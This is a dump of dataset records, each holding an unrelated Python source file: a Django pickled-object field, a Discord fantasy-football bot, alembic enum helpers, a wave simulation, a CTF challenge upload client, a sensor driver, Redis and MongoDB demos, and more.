test_json_movimiento():\n transaccion_a = Transaccion(dni_cliente= \"30949303\", tipo_movimiento= \"CASH_IN\", monto_movimiento= 500, estado= \"APROBADO\", nombre_comercio= \"PAGOFACIL\")\n to_dict = json.loads(transaccion_a.toJSON())\n\n print(f\"\\n Las keys del diccionario son: {to_dict.keys()}\\n\"\n f\"Los values del diccionario son: {to_dict.values()}\\n\"\n f\"Los items del diccionario son: {dict(to_dict.items())}\\n\"\n f\"El valor de la key de tipo de movimiento es: \"), to_dict.get('tipo_movimiento')\n\n for keys, values in to_dict.items():\n print(keys, \":\", values)\n\ntest_json_movimiento()\n","repo_name":"NaguBianchi/ParcialIntegrador","sub_path":"Parcial/Metodos.py","file_name":"Metodos.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39532666296","text":"\"\"\" Provides a Django model field that automatically pickles Python objects.\n Copied from http://djangosnippets.org/snippets/1694/\n\"\"\"\n\nfrom logging import getLogger\nfrom copy import deepcopy\nfrom base64 import b64encode, b64decode\nfrom zlib import compress, decompress\nfrom ast import literal_eval\nfrom pickle import loads, dumps\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\n\nlog = getLogger('django-runtime-tags')\n\nclass PickledObject(str):\n \"\"\"\n A subclass of string so it can be told whether a string is a pickled\n object or not (if the object is an instance of this class then it must\n [well, should] be a pickled one).\n\n Only really useful for passing pre-encoded values to ``default``\n with ``dbsafe_encode``, not that doing so is necessary. If you\n remove PickledObject and its references, you won't be able to pass\n in pre-encoded values anymore, but you can always just pass in the\n python objects themselves.\n\n \"\"\"\n pass\n\ndef dbsafe_encode(value, compress_object=False):\n \"\"\"\n We use deepcopy() here to avoid a problem with cPickle, where dumps\n can generate different character streams for same lookup value if\n they are referenced differently.\n\n The reason this is important is because we do all of our lookups as\n simple string matches, thus the character streams must be the same\n for the lookups to work properly. See tests.py for more information.\n \"\"\"\n if not compress_object:\n value = b64encode(dumps(deepcopy(value)))\n else:\n value = b64encode(compress(dumps(deepcopy(value))))\n\n value = value.decode()\n\n return PickledObject(value)\n\ndef dbsafe_decode(value, compress_object=False):\n if not compress_object:\n value = loads(b64decode(value))\n else:\n value = loads(decompress(b64decode(value)))\n return value\n\nclass PickledObjectField(models.Field):\n \"\"\"\n A field that will accept *any* python object and store it in the\n database. PickledObjectField will optionally compress it's values if\n declared with the keyword argument ``compress=True``.\n\n Does not actually encode and compress ``None`` objects (although you\n can still do lookups using None). This way, it is still possible to\n use the ``isnull`` lookup type correctly. Because of this, the field\n defaults to ``null=True``, as otherwise it wouldn't be able to store\n None values since they aren't pickled and encoded.\n\n\n \"\"\"\n description = 'Any basic Python object can be pickled and stored'\n\n def __init__(self, *args, **kwargs):\n self.compress = kwargs.pop('compress', False)\n self.protocol = kwargs.pop('protocol', 2)\n self.convert = kwargs.pop('convert', False)\n #self.validators = kwargs.pop('validators', [])\n kwargs.setdefault('null', True)\n kwargs.setdefault('editable', False)\n\n super(PickledObjectField, self).__init__(*args, **kwargs)\n\n def get_default(self):\n \"\"\"\n Returns the default value for this field.\n\n The default implementation on models.Field calls force_unicode\n on the default, which means you can't set arbitrary Python\n objects as the default. To fix this, we just return the value\n without calling force_unicode on it. Note that if you set a\n callable as a default, the field will still call it. It will\n *not* try to pickle and encode it.\n\n \"\"\"\n if self.has_default():\n if callable(self.default):\n return self.default()\n return self.default\n # If the field doesn't have a default, then we punt to models.Field.\n return super(PickledObjectField, self).get_default()\n\n # Changed in Django 1.8:\n # Historically, Django provided a metaclass called SubfieldBase which\n # always called to_python() on assignment. This did not play nicely with\n # custom database transformations, aggregation, or values queries, so it\n # has been replaced with from_db_value().\n def from_db_value(self, value, expression, connection):\n return self.to_python(value)\n\n def to_python(self, value):\n \"\"\"\n B64decode and unpickle the object, optionally decompressing it.\n\n If an error is raised in de-pickling and we're sure the value is\n a definite pickle, the error is allowed to propogate. If we\n aren't sure if the value is a pickle or not, then we catch the\n error and return the original value instead.\n\n \"\"\"\n if value is not None:\n try:\n value = dbsafe_decode(value, self.compress)\n except:\n # If the value is a definite pickle; and an error is raised in\n # de-pickling it should be allowed to propogate.\n if isinstance(value, PickledObject):\n raise\n return value\n\n def validate(self, value, model_instance):\n \"\"\" Catch this error here so it handled correctly by admin form.\n The '__' can be used in eval exploits -- disallow it.\n \"\"\"\n if '__' in value:\n raise ValidationError(\"'__' not allowed.\")\n\n def get_db_prep_value(self, value, *args, **kwargs):\n \"\"\"\n Pickle and b64encode the object, optionally compressing it.\n\n The pickling protocol is specified explicitly (by default 2),\n rather than as -1 or HIGHEST_PROTOCOL, because we don't want the\n protocol to change over time. If it did, ``exact`` and ``in``\n lookups would likely fail, since pickle would now be generating\n a different string.\n\n \"\"\"\n if value is not None and not isinstance(value, PickledObject):\n # We call force_unicode here explicitly, so that the encoded string\n # isn't rejected by the postgresql_psycopg2 backend. Alternatively,\n # we could have just registered PickledObject with the psycopg\n # marshaller (telling it to store it like it would a string), but\n # since both of these methods result in the same value being stored,\n # doing things this way is much easier.\n if self.convert:\n value = self.value_convert(value)\n value = dbsafe_encode(value, self.compress)\n return value\n\n def value_convert(self, value):\n \"\"\" Convert value from string to Python type, if possible.\n Nasty encoding issues, make sure to test values with\n non-ASCII characters!\n \"\"\"\n if isinstance(value, str):\n try:\n if value.lower() in ('true', 't'): value = 'True'\n elif value.lower() in ('false', 'f'): value = 'False'\n try:\n value = literal_eval(value)\n except (ValueError, SyntaxError) as e:\n log.warn('{}, {}'.format(value, e))\n value = \"'%s'\" % value.replace(\"'\", \"\\\\'\")\n try:\n value = literal_eval(value)\n except SyntaxError as e:\n log.error(e)\n raise ValidationError(str(e))\n return value\n except:\n raise\n return value\n\n def value_to_string(self, obj):\n value = self.value_from_object(obj)\n return self.get_db_prep_value(value)\n\n def get_internal_type(self):\n return 'TextField'\n\n def get_db_prep_lookup(self, lookup_type, value):\n if lookup_type not in ['exact', 'in', 'isnull']:\n raise TypeError('Lookup type %s is not supported.' % lookup_type)\n # The Field model already calls get_db_prep_value before doing the\n # actual lookup, so all we need to do is limit the lookup types.\n return super(PickledObjectField, self).get_db_prep_lookup(lookup_type, value)\n","repo_name":"burningmantech/django-runtime-tags","sub_path":"django_runtime_tags/pickled_object_field.py","file_name":"pickled_object_field.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"8880909893","text":"from fpl import FPL\nimport os\nimport discord\nfrom discord.ext import commands, tasks\nfrom dotenv import load_dotenv\nimport aiohttp\n\nload_dotenv()\nTOKEN = os.getenv('TOKEN')\n\nasync def get_current_gameweek(fpl_session):\n gameweek_data = await fpl_session.get_gameweeks(return_json=True)\n for gameweek in gameweek_data:\n if gameweek['is_current']:\n return gameweek['id']\n\nasync def get_team_details(fpl_session, picks):\n string = \"```\"\n point_sum = 0\n for player in picks:\n if player['multiplier'] > 0:\n p = await fpl_session.get_player(player['element'])\n points = p.event_points * player['multiplier']\n point_sum += points \n name = p.web_name\n if player['is_captain']:\n name += ' (C)'\n elif player['is_vice_captain']:\n name += ' (VC)'\n string += f'{name}: {points} \\n'\n string += 'Bench:\\n'\n for player in picks:\n if player['multiplier'] == 0:\n p = await fpl_session.get_player(player['element'])\n points = p.event_points * player['multiplier']\n name = p.web_name\n string += f'{name}: {points} \\n'\n string += f\"Total Points: {point_sum}```\"\n return string\n\nbot = commands.Bot(command_prefix='-')\n\n@bot.event\nasync def on_ready():\n print(\"Logged In\")\n\n\n@bot.command(name='get_team')\nasync def get_player_team(ctx, player_id: int):\n async with aiohttp.ClientSession() as session:\n fpl = FPL(session)\n gameweek = await get_current_gameweek(fpl)\n await ctx.send(f'Got Gameweek: {gameweek}')\n user = await fpl.get_user(player_id)\n await ctx.send(f'Got {user}')\n picks = await user.get_picks(gameweek)\n team = await get_team_details(fpl, picks[gameweek])\n await ctx.send(team)\n\nbot.run(TOKEN)","repo_name":"spacedlevo/fpl_discord_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12263506945","text":"from collections import defaultdict\nfrom typing import Tuple, Any, Set, Union, List, TYPE_CHECKING\n\nimport sqlalchemy\nfrom sqlalchemy import MetaData\nfrom sqlalchemy.dialects import postgresql\n\nfrom alembic_postgresql_enum.sql_commands.column_default import get_column_default\n\nif TYPE_CHECKING:\n from sqlalchemy.engine import Connection\n\nfrom alembic_postgresql_enum.get_enum_data import DeclaredEnumValues, TableReference, ColumnType\n\n\ndef get_enum_values(enum_type: sqlalchemy.Enum) -> 'Tuple[str, ...]':\n # For specific case when types.TypeDecorator is used\n if isinstance(enum_type, sqlalchemy.types.TypeDecorator):\n dialect = postgresql.dialect\n\n def value_processor(value):\n return enum_type.process_bind_param(\n enum_type.impl.result_processor(dialect, enum_type)(value),\n dialect\n )\n else:\n def value_processor(enum_value):\n return enum_value\n return tuple(value_processor(value) for value in enum_type.enums)\n\n\ndef column_type_is_enum(column_type: Any) -> bool:\n if isinstance(column_type, sqlalchemy.Enum):\n return column_type.native_enum\n\n # For specific case when types.TypeDecorator is used\n if isinstance(getattr(column_type, 'impl', None), sqlalchemy.Enum):\n return True\n\n return False\n\n\ndef get_declared_enums(metadata: Union[MetaData, List[MetaData]],\n schema: str,\n default_schema: str,\n connection: 'Connection',\n ) -> DeclaredEnumValues:\n \"\"\"\n Return a dict mapping SQLAlchemy declared enumeration types to the set of their values\n with columns where enums are used.\n :param metadata:\n SqlAlchemy schema\n :param str schema:\n Schema name (e.g. \"public\").\n :param default_schema:\n Default schema name, likely will be \"public\"\n :param connection:\n Database connection\n :returns DeclaredEnumValues:\n enum_values: {\n \"my_enum\": tuple([\"a\", \"b\", \"c\"]),\n },\n enum_table_references: {\n \"my_enum\": {\n EnumToTable(table_name=\"my_table\", column_name=\"my_column\")\n }\n }\n \"\"\"\n enum_name_to_values = dict()\n enum_name_to_table_references: defaultdict[str, Set[TableReference]] = defaultdict(set)\n\n if isinstance(metadata, list):\n metadata_list = metadata\n else:\n metadata_list = [metadata]\n\n for metadata in metadata_list:\n for table in metadata.tables.values():\n for column in table.columns:\n column_type = column.type\n column_type_wrapper = ColumnType.COMMON\n\n # if column is array of enums\n if isinstance(column_type, sqlalchemy.ARRAY):\n column_type = column_type.item_type\n column_type_wrapper = ColumnType.ARRAY\n\n if not column_type_is_enum(column_type):\n continue\n\n column_type_schema = column_type.schema or default_schema\n if column_type_schema != schema:\n continue\n\n if column_type.name not in enum_name_to_values:\n enum_name_to_values[column_type.name] = get_enum_values(column_type)\n\n column_default = get_column_default(connection, schema, table.name, column.name)\n enum_name_to_table_references[column_type.name].add(\n TableReference(table.name, column.name, column_type_wrapper, column_default)\n )\n\n return DeclaredEnumValues(\n enum_values=enum_name_to_values,\n enum_table_references={enum_name: frozenset(table_references)\n for enum_name, table_references\n in enum_name_to_table_references.items()},\n )\n","repo_name":"Pogchamp-company/alembic-postgresql-enum","sub_path":"alembic_postgresql_enum/get_enum_data/declared_enums.py","file_name":"declared_enums.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"53"} +{"seq_id":"37738955511","text":"# IMPORTS\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Definição das constantes do exc\nS1 = 1\nS2 = 0.99\nS3 = 0.5\nK = 200 # Número de divisões do espaço livre\nN1 = int(K/S1) # Número de divisões do tempo\nN2 = int(K/S2) # Número de divisões do tempo\nN3 = int(K/S3) # Número de divisões do tempo\nNd1 = int(160/S1) # N desejado para fazer o plot\nNd2 = int(160/S2) # N desejado para fazer o plot\nNd3 = int(160/S3) # N desejado para fazer o plot\n\n\ndef func(n, S):\n if n > 40/S:\n return 0\n else:\n return 1\n\n\ndef calcWavef(U, S, N):\n # Definição dos valores iniciais\n for n in range(0, N):\n U[n, 0] = func(n, S)\n\n for i in range(0, K):\n U[0, i] = 0\n\n for n in range(1, N-1):\n for i in range(1, K):\n U[n+1, i] = (S**2)*(U[n, i+1] - 2*U[n, i] +\n U[n, i-1]) + 2*U[n, i] - U[n-1, i]\n return U\n\n\n# SCRIPT PRINCIPAL\nU1 = np.zeros((N1, K+1)) # Função de onda U1 no tempo n, no espaço i\nU2 = np.zeros((N2, K+1)) # Função de onda U no tempo n, no espaço i\nU3 = np.zeros((N3, K+1)) # Função de onda U no tempo n, no espaço i\ngI = np.arange(0, K, 1)\nfig, ax = plt.subplots(1, 3, sharey=True)\n\nU1 = calcWavef(U1, S1, N1)\nax[0].plot(gI, U1[Nd1, gI])\nax[0].grid(True)\nax[0].set_title(\"Wavefunction para S = \" + str(S1))\nax[0].set_ylabel(\"Wavefunction U(i)\")\nax[0].set_xlabel(\"Coordenada i do grid\")\n\nU2 = calcWavef(U2, S2, N2)\nax[1].plot(gI, U2[Nd2, gI], color='orange')\nax[1].grid(True)\nax[1].set_title(\"Wavefunction para S = \" + str(S2))\nax[1].set_ylabel(\"Wavefunction U(i)\")\nax[1].set_xlabel(\"Coordenada i do grid\")\n\nU3 = calcWavef(U3, S3, N3)\nax[2].plot(gI, U3[Nd3, gI], color='purple')\nax[2].grid(True)\nax[2].set_title(\"Wavefunction para S = \" + str(S3))\nax[2].set_ylabel(\"Wavefunction U(i)\")\nax[2].set_xlabel(\"Coordenada i do grid\")\n\nplt.show()\n","repo_name":"RodrigoValeretto/Trabalhos-Ondas","sub_path":"Trab2-Ondas/exc2.7.py","file_name":"exc2.7.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37857883104","text":"#!/usr/bin/env python3\nimport socket\nimport sys\nimport time\n\n# Read from the socket until a string is reached\ndef read_until(s, end, drop = False):\n if isinstance(end, str):\n end = end.encode()\n\n c = s.recv(1)\n data = c\n\n while data[-len(end) :] != end:\n c = s.recv(1)\n data += c\n \n if drop:\n # Remove token string we were looking for from the output\n data = data[: -len(end)]\n \n return data.decode()\n\n\n# Read a line from the socket\ndef readline(s, drop = False):\n return read_until(s, \"\\n\")\n\n\nif len(sys.argv) != 5:\n print(f\"Usage: {sys.argv[0]} SERVER_IP SERVER_PORT SOURCE_FILE OUTPUT_FILE\", file = sys.stderr)\n sys.exit(1)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1], int(sys.argv[2])))\n\nwith open(sys.argv[3], \"rb\") as f:\n source = f.read()\n\nsource_length = len(source)\n\n# Time string\nreadline(s)\n\n# File size prompt\nread_until(s, \": \")\n\n# Send file size. The \\n is important!\ns.send(f\"{source_length}\\n\".encode())\n\n# Make sure to wait for the server to be ready to receive input, then send Python source code\ntime.sleep(0.1)\ns.send(source)\n\n# Compiled obfuscated python source\ncompiled = s.recv(4096)\n\nwith open(sys.argv[4], \"wb\") as f:\n f.write(compiled)","repo_name":"UnitedCTF/UnitedCTF-2019","sub_path":"challenges/pwn/python-obfuscator/codec/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"22479613152","text":"#!/usr/bin/python\n#coding=utf-8\n#注意本程序是python3!!!\nimport RPi.GPIO as GPIO\nimport time\nfrom ctypes import *\nimport os\n#本来准备调用C语言实现的微秒级定时器,但还是有很大问题。。。\nlibc = cdll.LoadLibrary(os.getcwd() + \"/libc.so\")\n\n'''\nBOARD方式第2引脚(5V)接到传感器正极\nBOARD方式第14引脚(0V)接到传感器负极\nBOARD方式第16引脚(GPIO.4, BCM方式编号23,wPi方式编号4)输入,从传感器OUT读取数据\n2+----------5K R------------|\n16<-------------------------|\n2+---------------------+SENSER-|\n14-----------------------------|\n'''\n\n#存放时序数据\ndata = [0 for i in range(40)]\n\ndef driver():\n\tj = 0\n\t# 传感器上电后,要等待1s以越过不稳定状态\n\tGPIO.setmode(GPIO.BOARD)\n\ttime.sleep(1)\n\t# 先向传感器发送开始信号,握手-LOW-\n\tGPIO.setup(16, GPIO.OUT)\n\tGPIO.output(16, GPIO.LOW)\n\t# 主机把总线拉低必须大于18毫秒,这里采用20毫秒\n\ttime.sleep(0.02)\n\t# 然后主机拉高并延时等待传感器的响应\n\tGPIO.output(16, GPIO.HIGH)\n\ti = 1\n\ti = 1\n\ti = 1\n\ti = 1\n\t# 等待传感器的握手响应信号和数据信号\n\tGPIO.setup(16, GPIO.IN)\n\twhile GPIO.input(16) == 1:\n\t\tcontinue\n\t# 总线为低电平,说明传感器发送响应信号,80us低电平\n\twhile GPIO.input(16) == 0:\n\t\tcontinue\n\t# 然后传感器再把总线拉高80us,然后才准备发送数据\n\twhile GPIO.input(16) == 1:\n\t\tcontinue\n\t# 开始发送数据\n\t# 一次完整的数据为40bit,高位先出 \n\t# 8bit湿度整数数据+8bit湿度小数数据+8bit温度整数数据+8bit温度小数数据+8bit校验和\n\twhile j < 40:\n\t\tk = 0\n\t\t#每一位的起始信号,都以50us低电平开始\n\t\twhile GPIO.input(16) == 0:\n\t\t\tcontinue\n\t\t#每一位的数值信号,高电平的长短决定了数据位是0还是1。\n\t\twhile GPIO.input(16) == 1:\n\t\t\t#需要知道每次循环的耗时,才能知道k < x是表示0\n\t\t\tk += 1\n\t\t\tif k > 100:\n\t\t\t\tbreak\n\t\t# 高电平持续26-28us表示0, 高电平持续70us表示1\n\t\tif k < 3:\n\t\t\tdata[j] = 0\n\t\telse:\n\t\t\tdata[j] = 1\n\t\tj += 1\n\tprint(data)\t\ndef compute():\n\thumidity_bit = data[0:8]\n\thumidity_point_bit = data[8:16]\n\ttemperature_bit = data[16:24]\n\ttemperature_point_bit = data[24:32]\n\tcheck_bit = data[32:40]\n\thumidity = 0\n\thumidity_point = 0\n\ttemperature = 0\n\ttemperature_point = 0\n\tcheck = 0\n\tfor i in range(8):\n\t\thumidity += humidity_bit[i] * 2**(7-i)\n\t\thumidity_point += humidity_point_bit[i] * 2**(7-i)\n\t\ttemperature += temperature_bit[i] * 2**(7-i)\n\t\ttemperature_point += temperature_point_bit[i] * 2**(7-i)\n\t\tcheck += check_bit[i] * 2**(7-i)\n\tsum = humidity + humidity_point + temperature + temperature_point\n\tprint(\"temperature:\", temperature, \", humidity:\", humidity)\n\tif check == sum:\n\t\tprint(\"temperature:\", temperature, \", humidity:\", humidity)\n\telse:\n\t\tprint(\"wrong!\", check, \"!=\", sum)\n\nif __name__ == \"__main__\":\n\tdriver()\n\tcompute()\n\tGPIO.cleanup()\n\n","repo_name":"hustlbj/raspberry","sub_path":"py_scripts/dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71265498087","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: redis_pubsub_demo.py\n# Author: lxw\n# Date: 9/28/17 2:58 PM\n\"\"\"\nReferences:\n[使用python来搞定redis的订阅功能](http://www.cnblogs.com/anpengapple/p/7027979.html)\n[使用redis快速搭建发布-订阅系统(python3x)](http://blog.csdn.net/drdairen/article/details/51659061)\n[A short script exploring Redis pubsub functions in Python](https://gist.github.com/lxw0109/ee6b578a454f5d17e0d1adc3219b8a21)\n\nNOTE: ��运行订阅者再运行发布者: 如果一个消息没有订阅者,那它会从redis服务器中消失(所以要先启动订阅者,再启动发布者)\n\"\"\"\n\nimport redis\nimport threading\n\n# 要注意检查type,一旦listen就会收到一个消息,但不是发布者的消息,而是系统发来的,内容为{'pattern': None, 'type': 'subscribe', 'channel': 'spub', 'data': 1L},表示:订阅成功,频道是spub,当前有一个订阅用户。\n\nclass RedisSubscriber(threading.Thread): # Listener\n \"\"\"\n Redis频道订阅辅助类\n \"\"\"\n def __init__(self, redis_conn, channels):\n threading.Thread.__init__(self)\n self.redis = redis_conn\n self.pubsub = self.redis.pubsub()\n self.pubsub.psubscribe(channels) # 同时订阅多个频道,要用psubscribe\n\n def work(self, item):\n print(\"Channel:{0}, data:{1}\".format(item[\"channel\"], item[\"data\"]))\n\n def run(self):\n for item in self.pubsub.listen():\n if item[\"data\"] == \"KILL\":\n self.pubsub.unsubscribe()\n print(\"{0}, unsubscribed and finished\".format(self))\n break\n else:\n self.work(item)\n\n\ndef main():\n pool = redis.ConnectionPool(host=\"192.168.1.41\", port=6379, db=0)\n redis_conn = redis.Redis(connection_pool=pool)\n client = RedisSubscriber(redis_conn, [\"channel1\", \"channel2\"])\n client.start()\n\n redis_conn.publish(\"channel1\", \"lxw: this will reach the subscriber.\")\n redis_conn.publish(\"channel123\", \"lxw: this will NOT reach the subscriber.\")\n redis_conn.publish(\"channel2\", \"lxw: this will reach the subscriber.\")\n redis_conn.publish(\"channel2\", \"KILL\")\n redis_conn.publish(\"channel1\", \"KILL\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"lxw0109/Python_Demos","sub_path":"redis_pubsub_demo/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32827610004","text":"# importing the module\nfrom gc import collect\nfrom tokenize import Name\nfrom pymongo import MongoClient\n \n# creating a MongoClient object \nclient = MongoClient() \n \n# connecting with the portnumber and host \nclient = MongoClient('localhost', 27017)\n \n# accessing the database \ndatabase = client['BDD'] \n \n# access collection of the database \ncollection = database['world'] \n\ndef QST1(): # Déterminer le nombre exact de pays \n return len(collection.distinct(\"Name\")) #or return collection.distinct(\"Name\").length\n\ndef QST2(): # Lister les différents continents \n return collection.distinct(\"Continent\")\n\ndef QST3(): # Lister les informations de l’Algérie\n return collection.find_one({\"Name\":\"Algeria\"})\n\ndef QST4(): # Lister les pays du continent Africain, ayant une population inférieure à 100000 habitants\n countries = []\n for post in (collection.find({\"Continent\":\"Africa\", \"Population\":{\"$lt\": 100000}},{\"Name\" :1}).sort(\"Name\")):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST5(): # Lister les pays indépendant du continent océanique \n countries = []\n for post in (collection.find({\"Continent\":\"Oceania\", \"IndepYear\":{\"$ne\": \"NA\"}},{\"Name\" :1}).sort(\"Name\")):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST6(): # Quel est le plus gros continent en termes de surface ? (un seul continent affiché à la fin) \n countries = []\n for post in (collection.find().sort(\"SurfaceArea\", -1).limit(1)):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST7(): # Donner par continents le nombre de pays, la population totale et en bonus le nombre de pays indépendant. \n continents_infos = {}\n for post in collection.distinct(\"Continent\"):\n continent_infos = {}\n count = collection.count_documents({\"Continent\":post})\n count_indi = collection.count_documents({\"Continent\":post, \"IndepYear\":{\"$ne\": \"NA\"}})\n continent_infos[\"Number of countries\"] = count\n continent_infos[\"Size of the population\"] = 0\n continent_infos[\"Number of independent countries\"] = count_indi\n continents_infos[post] = continent_infos\n\n pipe = [{'$group': {'_id': \"$Continent\", 'total': {'$sum': '$Population'}}}]\n for post in collection.aggregate(pipeline=pipe):\n continents_infos[post[\"_id\"]][\"Size of the population\"] = post[\"total\"]\n\n return continents_infos\n\ndef QST8(): # Donner la population totale des villes d’Algérie \n n = collection.find_one({\"Name\":\"Algeria\"})[\"Cities\"]\n count = sum(map(lambda x: int(x['Population']), n))\n\n return count\n\ndef QST9(): # 9. Donner la capitale (uniquement nom de la ville et population) d’Algérie \n capital = collection.find_one({\"Name\": \"Algeria\"})[\"Capital\"]\n keys = [\"Name\", \"Population\"]\n capital_info = [capital[key] for key in keys]\n return capital_info\n\ndef QST10(): # 10. Quelles sont les langues parlées dans plus de 15 pays ? \n '''\n db.world.aggregate([\n {\n $addFields: { Langue : {$concatArrays: [\"$OffLang\",\"$NotOffLang\" ] } }\n },\n {$unwind: \"$Langue\"\n },\n { $group: {\n _id:\"$Langue.Language\",\n \"nb\" : {$sum :1} \n }\n },\n { $match: { \"nb\": { $gt: 15 } } }\n ])\n\n '''\n languages = []\n pipe = [{'$addFields': { \"Langue\" : {'$concatArrays': [\"$OffLang\",\"$NotOffLang\" ] } }},{'$unwind': \"$Langue\"},{'$group': { \"_id\":\"$Langue.Language\", \"Number of Countries\" : {'$sum' :1}}}, { '$match': { \"nb\": { '$gt': 15 } } }]\n\n for post in collection.aggregate(pipeline=pipe):\n languages.append(post)\n return languages\n\n\ndef QST11(): # 11. Calculer pour chaque pays le nombre de villes (pour les pays ayant au moins 100 villes), en les triant par ordre décroissant du nombre de villes\n '''\n db.world.aggregate([\n { \n $addFields: { villes : {$size: { \"$ifNull\": [ \"$Cities\", [] ] } } }\n }, \n {\n $match: {\n villes: { $gt: 100 }\n }\n },\n { $sort: {\"villes\":-1} },\n {\n $project: {\n _id: \"$Name\",\n \"Number of Cities\" :\"$villes\"\n }\n }\n])\n '''\n pays = []\n pipe = [{ '$addFields': { \"villes\" : {'$size': { \"$ifNull\": [ \"$Cities\", [] ] } } }}, {'$match': {\"villes\": { '$gt': 100 }}},{ '$sort': {\"villes\":-1} },{'$project': {\"_id\": \"$Name\",\"Number of Cities\" :\"$villes\"}}]\n for post in collection.aggregate(pipeline=pipe):\n pays.append(post)\n return pays\n\ndef QST12(): # 12. Lister les 10 villes les plus habitées, ainsi que leur pays, dans l’ordre décroissant de la population\n '''\n db.world.aggregate([\n {$unwind: \"$Cities\"\n },\n {$sort: {\"Cities.Population\":-1} },\n { $limit : 10 },\n {$sort: {\"Cities.Population\":1} },\n {\n $project: {\n _id:\"$Cities.Name\",\n \"Country\":\"$Name\",\n \"City Population\":\"$Cities.Population\"\n }\n }\n ])\n '''\n villes = []\n pipe = [{'$unwind': \"$Cities\"},{'$sort': {\"Cities.Population\":-1} },{ '$limit' : 10 },{'$sort': {\"Cities.Population\":1} },{'$project': { \"_id\":\"$Cities.Name\",\"Country\":\"$Name\",\"City Population\":\"$Cities.Population\"}}]\n for post in collection.aggregate(pipeline=pipe):\n villes.append(post)\n return villes\n\ndef QST13(): # 13. Lister les pays pour lesquels l’Arabe est une langue officielle \n '''\n db.world.find({\"OffLang.Language\":{$eq:\"Arabic\"}},{\"Name\":1})\n '''\n countries =[]\n for post in (collection.find({\"OffLang.Language\":{'$eq':\"Arabic\"}},{\"Name\":1})):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST14(): # 14. Lister les 5 pays avec le plus de langues parlées \n '''\n db.world.aggregate([\n {\n $addFields: { c : {$concatArrays: [\"$OffLang\",\"$NotOffLang\" ] } }\n },\n { \n $addFields: { langs : {$size: { \"$ifNull\": [ \"$c\", [] ] } } }\n \n }, \n { \n $sort: {\"langs\":-1} \n },\n { $limit : 5 },\n {\n $group: {\n _id:\"$Name\"\n }\n }\n])\n'''\n countries =[]\n pipe = [ {'$addFields': { \"c\" : {'$concatArrays': [\"$OffLang\",\"$NotOffLang\" ] } }},{ '$addFields': { \"langs\" : {'$size': { \"$ifNull\": [ \"$c\", [] ] } } }},{ '$sort': {\"langs\":-1} },{ '$limit' : 5 },{'$group': {\"_id\":\"$Name\"}}]\n\n for post in collection.aggregate(pipeline=pipe):\n countries.append(post[\"_id\"])\n return countries\n\ndef QST15(): # 15. Lister les pays pour lesquels la somme des populations des villes est supérieure à la population du pays. \n '''\n db.world.aggregate([\n {\n $addFields: { somme : {$sum: \"$Cities.Population\"} } \n },\n {\n $addFields:{comp : {$cmp: ['$somme','$Population']}}\n },\n {$match: {comp:{$gt:1}}},\n {\n $project: {\n _id:\"$Name\",\n \"Total Cities Population\":\"$somme\",\n \"Country Population\":\"$Population\"\n }\n }\n])\n '''\n countries =[]\n pipe = [ {\n '$addFields': { \"somme\" : {'$sum': \"$Cities.Population\"} } \n },\n {\n '$addFields':{\"comp\" : {'$cmp': ['$somme','$Population']}}\n },\n {'$match': {\"comp\":{'$gt':1}}},\n {\n '$project': {\n \"_id\":\"$Name\",\n \"Total Cities Population\":\"$somme\",\n \"Country Population\":\"$Population\"\n }\n }]\n\n for post in collection.aggregate(pipeline=pipe):\n countries.append(post[\"_id\"])\n\n return countries\n\n\n\n\n","repo_name":"IliesChibane/Projet-BDA","sub_path":"Projet-BDA/DBrequests.py","file_name":"DBrequests.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9363934363","text":"from lineup import LineUp\nfrom fielder import Fielder\nfrom ball_in_play import BallInPlay\nfrom constants import DEFAULT_INTERVAL_MS\nfrom constants import DEFAULT_FIELDER_HEIGHT\nfrom src.coordinates import CartesianCoordinate\n\n\nclass CatchCalculator:\n def __init__(self):\n pass\n\n @staticmethod\n def calculate_out_fielder(fielder: Fielder, ball_in_play: BallInPlay, flight_path: list[CartesianCoordinate]) \\\n -> [bool, list[CartesianCoordinate]]:\n radii = fielder.get_radii()\n out = False\n intersections = []\n for t in range(len(ball_in_play.path)):\n ball = ball_in_play.path[t]\n if 0 < ball.z < DEFAULT_FIELDER_HEIGHT \\\n and fielder.coordinates_cartesian.x - radii[t][0] < ball.x < fielder.coordinates_cartesian.x + radii[t][0] \\\n and fielder.coordinates_cartesian.y - radii[t][0] < ball.y < fielder.coordinates_cartesian.y + radii[t][0]:\n out = True\n intersections.append(ball)\n ball_in_play.caught = out\n return out, intersections\n\n @staticmethod\n def calculate_out_lineup(lineup: LineUp, flight_path: list[CartesianCoordinate]) -> [bool, list[(str, CartesianCoordinate)]]:\n out = False\n intersections = []\n for fielder in lineup.fielders:\n caught, positions = CatchCalculator.calculate_out_fielder(fielder, flight_path)\n if caught:\n out = 